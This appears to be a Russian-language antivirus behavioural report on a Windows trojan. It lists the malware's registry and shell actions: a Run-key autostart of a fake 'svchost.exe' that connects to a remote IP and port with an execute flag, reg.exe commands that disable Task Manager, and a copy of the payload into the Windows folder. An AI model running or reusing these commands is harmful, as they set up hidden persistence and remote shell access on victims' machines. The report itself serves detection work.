Техническая информация
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'svchost.exe' = '%WINDIR%\svchost.exe -d 123.123.123.123 1234 -e'
- Диспетчера задач (Taskmgr)
- '<SYSTEM32>\reg.exe' ADD HKLM\SOFTWARE\Microsoft\Windows\Currentversion\run /v svchost.exe /d "%WINDIR%\svchost.exe -d 123.123.123.123 1234 -e
- '<SYSTEM32>\cmd.exe' /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
- '<SYSTEM32>\reg.exe' add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
- '<SYSTEM32>\cmd.exe' /c "reg ADD HKLM\SOFTWARE\Microsoft\Windows\Currentversion\run /v svchost.exe /d "%WINDIR%\svchost.exe -d 123.123.123.123 1234 -e"
- '<SYSTEM32>\cmd.exe' /c "copy setup-1.bin %WINDIR%\ "
- '<SYSTEM32>\cmd.exe' /c "reg delete HKLM\SOFTWARE\Microsoft\Windows\Currentversion\run /v svchost.exe /f "
- '<SYSTEM32>\reg.exe' delete HKLM\SOFTWARE\Microsoft\Windows\Currentversion\run /v svchost.exe /f